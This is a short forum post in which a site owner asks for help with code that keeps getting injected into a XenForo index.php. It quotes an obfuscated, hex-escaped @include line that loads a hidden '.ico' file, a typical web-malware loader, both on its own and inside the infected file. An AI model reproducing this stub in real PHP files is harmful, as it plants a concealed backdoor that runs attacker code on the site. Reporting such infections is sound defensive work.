AbuGhaith
Well-known member
i hope is the right place to post this
this code is automatically add to the index.php file
and the index.php file become like this
this code is automatically add to the index.php file
PHP:
/*93e62*/
@include "\x2fhom\x65/mz\x61mee\x72/pu\x62lic\x5fhtm\x6c/be\x6e-tw\x61ma/\x312/.\x6215f\x66c8b\x2eico";
/*93e62*/
and the index.php file become like this
PHP:
<?php
/*93e62*/
@include "\x2fhom\x65/mz\x61mee\x72/pu\x62lic\x5fhtm\x6c/be\x6e-tw\x61ma/\x312/.\x6215f\x66c8b\x2eico";
/*93e62*/
$phpVersion = phpversion();
if (version_compare($phpVersion, '5.4.0', '<'))
{
die("PHP 5.4.0 or newer is required. $phpVersion does not meet this requirement. Please ask your host to upgrade PHP.");
}
$dir = __DIR__;
require($dir . '/src/XF.php');
XF::start($dir);
XF::runApp('XF\Pub\App');